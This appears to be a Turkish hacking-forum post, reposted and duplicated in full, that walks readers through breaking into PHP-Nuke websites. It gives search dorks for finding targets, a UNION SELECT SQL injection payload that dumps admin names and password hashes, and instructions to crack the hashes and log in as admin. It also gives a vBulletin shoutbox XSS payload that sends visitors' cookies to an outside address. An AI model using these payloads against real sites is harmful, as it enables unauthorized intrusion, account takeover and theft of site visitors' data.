Php Nukedeki search modulunden dogan sql injection [hash cekme ] acıgı ..
adım 1 - ilk önce www.altavista.com a giriyoruz ondan sonra şunu aratıyoruz
PHP-Nuke Copyright © 2004 by Francisco Burzi
arama olayı için şu önemli bence googleyi kullanmayın altavista daha iyi sonuç verir ve mesela altavistada aratıyosunuz örneğin şöyle aratın :
PHP-Nuke Copyright © 2004 by Francisco Burzi aşk
aratma kodunun yanına her hangi bir konuyu yazın ehee daha güzel sonuca ulaşırsınız
2-evet şimdi bi siteye girdik sitenin search bölümü aktif olmalı değilse fıss
sitenin adresinin sonuna şunu ekleyin örnek : www.hedef.com/modules.php?name=Search
sonra orda şu kodu aratın :
p0gg0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
karşınıza admin nickleri ve hashler gelecek resimdeki gibi : https://tik.lat/04EZA
bunu da www.milw0rm.com da kırın ve admin.php den gırıp hackleyın
-------------------------------------------------------------------------
2.bır acık eskı ama yapın
arama: powered by php-nuke site:.fr
yada site:.dk cogaltabılırsınız acıkları usttekıde kullanılabılır
arama2: inurl://modules.php?name=search site:.fr yazıp aradıktan sonra modules.php?name=Search silip admin.php yazıyoruz daha sonra su kodu eklıyoruz
http://spirit31.sitemynet.com/operayontemi/1.jpg[/URL]
[URL="https://tik.lat/HkD8f"] http://spirit31.sitemynet.com/operayontemi/2.jpg[/URL]
[URL="https://tik.lat/uN2Ey"] http://spirit31.sitemynet.com/operayontemi/3.jpg[/URL]
[URL="https://tik.lat/ItsAc"] http://spirit31.sitemynet.com/operayontemi/4.jpg[/URL]
[URL="https://tik.lat/bJtoa"] http://spirit31.sitemynet.com/operayontemi/5.jpg[/URL]
[URL="https://tik.lat/qKgpJ"] http://spirit31.sitemynet.com/operayontemi/6.jph[/URL]
[URL="https://tik.lat/rIa8w"] http://spirit31.sitemynet.com/operayontemi/7.jpg[/URL]
--------------------------------------------------------------------------------------------
Shoutbox bilindiği gibi vbulletinlerde(başka portalada oluyormu bilmiyorum) kuruluyor ve site içi chat yapmaya yarıyor.Ben bu açığı daha önce türk sitelerinde görmedim ama belki eski bir açık olabilir genede paylaşayım dedim.
Şimdi Yapmanız gereken şey şu Shoutbox kurulu bir site buluyor üye oluyorsunuz ve chat kısmına şu kodu yazıyorsunuz
Kod:
<pre a=’>’ onmouseover=’document.********="http://www.yönlenecekadres.com?c=[/URL] b=’</pre’ >
Bu kodu yazarsanız forum yönlenir ama biraz geç yönleniyor ama yönleniyor bazı sitelerde işte yaramıyor kod ortaya çıkıyor.
Google ’’ /vbshout.php?do=archive ’’ şeklinde aratırsanız bulursunuz.
<html kodlarının açık olması gerekmektedir>
--------------------------------------------------------------------------------------------
ALINTIDIR...:yaho1 :yo :woott
uah :mml
adım 1 - ilk önce www.altavista.com a giriyoruz ondan sonra şunu aratıyoruz
PHP-Nuke Copyright © 2004 by Francisco Burzi
arama olayı için şu önemli bence googleyi kullanmayın altavista daha iyi sonuç verir ve mesela altavistada aratıyosunuz örneğin şöyle aratın :
PHP-Nuke Copyright © 2004 by Francisco Burzi aşk
aratma kodunun yanına her hangi bir konuyu yazın ehee daha güzel sonuca ulaşırsınız
2-evet şimdi bi siteye girdik sitenin search bölümü aktif olmalı değilse fıss
sitenin adresinin sonuna şunu ekleyin örnek : www.hedef.com/modules.php?name=Search
sonra orda şu kodu aratın :
p0gg0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
karşınıza admin nickleri ve hashler gelecek resimdeki gibi : https://tik.lat/04EZA
bunu da www.milw0rm.com da kırın ve admin.php den gırıp hackleyın
-------------------------------------------------------------------------
2.bır acık eskı ama yapın
arama: powered by php-nuke site:.fr
yada site:.dk cogaltabılırsınız acıkları usttekıde kullanılabılır
arama2: inurl://modules.php?name=search site:.fr yazıp aradıktan sonra modules.php?name=Search silip admin.php yazıyoruz daha sonra su kodu eklıyoruz
http://spirit31.sitemynet.com/operayontemi/1.jpg[/URL]
[URL="https://tik.lat/HkD8f"] http://spirit31.sitemynet.com/operayontemi/2.jpg[/URL]
[URL="https://tik.lat/uN2Ey"] http://spirit31.sitemynet.com/operayontemi/3.jpg[/URL]
[URL="https://tik.lat/ItsAc"] http://spirit31.sitemynet.com/operayontemi/4.jpg[/URL]
[URL="https://tik.lat/bJtoa"] http://spirit31.sitemynet.com/operayontemi/5.jpg[/URL]
[URL="https://tik.lat/qKgpJ"] http://spirit31.sitemynet.com/operayontemi/6.jph[/URL]
[URL="https://tik.lat/rIa8w"] http://spirit31.sitemynet.com/operayontemi/7.jpg[/URL]
--------------------------------------------------------------------------------------------
Shoutbox bilindiği gibi vbulletinlerde(başka portalada oluyormu bilmiyorum) kuruluyor ve site içi chat yapmaya yarıyor.Ben bu açığı daha önce türk sitelerinde görmedim ama belki eski bir açık olabilir genede paylaşayım dedim.
Şimdi Yapmanız gereken şey şu Shoutbox kurulu bir site buluyor üye oluyorsunuz ve chat kısmına şu kodu yazıyorsunuz
Kod:
<pre a=’>’ onmouseover=’document.********="http://www.yönlenecekadres.com?c=[/URL] b=’</pre’ >
Bu kodu yazarsanız forum yönlenir ama biraz geç yönleniyor ama yönleniyor bazı sitelerde işte yaramıyor kod ortaya çıkıyor.
Google ’’ /vbshout.php?do=archive ’’ şeklinde aratırsanız bulursunuz.
<html kodlarının açık olması gerekmektedir>
--------------------------------------------------------------------------------------------
ALINTIDIR...:yaho1 :yo :woott
uah :mml 
